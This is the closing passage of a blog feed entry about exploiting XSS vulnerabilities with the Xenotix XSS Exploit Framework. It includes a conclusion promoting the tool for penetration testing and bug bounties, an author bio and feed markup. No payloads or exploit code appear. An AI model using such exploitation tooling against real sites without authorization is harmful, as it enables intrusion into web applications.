the victim-server traffic will be added in future builds. Automatic detection
of parameters or variables vulnerable against XSS and DOM Based XSS detection
will be added up in next build.&lt;/span&gt;&lt;/div&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;XSS
in popular website is a high security threat. Xenotix XSS Exploit Framework can
be used by Security Analysts to perform penetration test on Web Applications
against XSS vulnerability and to create POC with the inbuilt exploitation
framework. Most of the security tools related to XSS are either XSS Scanners or
XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its
kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework.
Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty,
Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.&lt;/span&gt;&lt;span style="font-family: Wingdings; font-size: 12.0pt; line-height: 115%; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;"&gt;&lt;span style="mso-char-type: symbol; mso-symbol-font-family: Wingdings;"&gt;J&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h4&gt;

&lt;/h4&gt;
&lt;h4 class="MsoNormal"&gt;
&lt;span style="font-size: 16.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 14.0pt; mso-bidi-theme-font: minor-latin;"&gt;About
Ajin Abraham&lt;/span&gt;&lt;/h4&gt;
&lt;div class="MsoNormal"&gt;
&lt;span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Ajin Abraham is an Information
Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework.
He had published different whitepapers and tools in the scope of Information
Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest
Ethical Hacking Competition. His area of interest includes web application
penetration testing, coding tools, exploit development and fuzzing. He has been
a speaker at many security conferences including Defcon Bangalore-India &lt;a href="https://www.blogger.com/blogger.g?blogID=3121270199089759062" name="_GoBack"&gt;&lt;/a&gt;2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013,
Hack Miami 2013, BlackHat Europe 2013 and many more.&lt;/span&gt;&lt;span lang="EN-GB" style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"&gt;

&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9NfRX6xWPp0:kAzH5xavpwU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9NfRX6xWPp0:kAzH5xavpwU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9NfRX6xWPp0:kAzH5xavpwU:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=9NfRX6xWPp0:kAzH5xavpwU:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=9NfRX6xWPp0:kAzH5xavpwU:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/9NfRX6xWPp0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2466476468432991309/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/exploiting-xss-vulnerabilities-xenotix.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2466476468432991309?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2466476468432991309?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/9NfRX6xWPp0/exploiting-xss-vulnerabilities-xenotix.html" title="Exploiting XSS Vulnerabilites With Xenotix" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i47.tinypic.com/15wjkau_th.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/exploiting-xss-vulnerabilities-xenotix.html</feedburner:origLink></entry></feed>
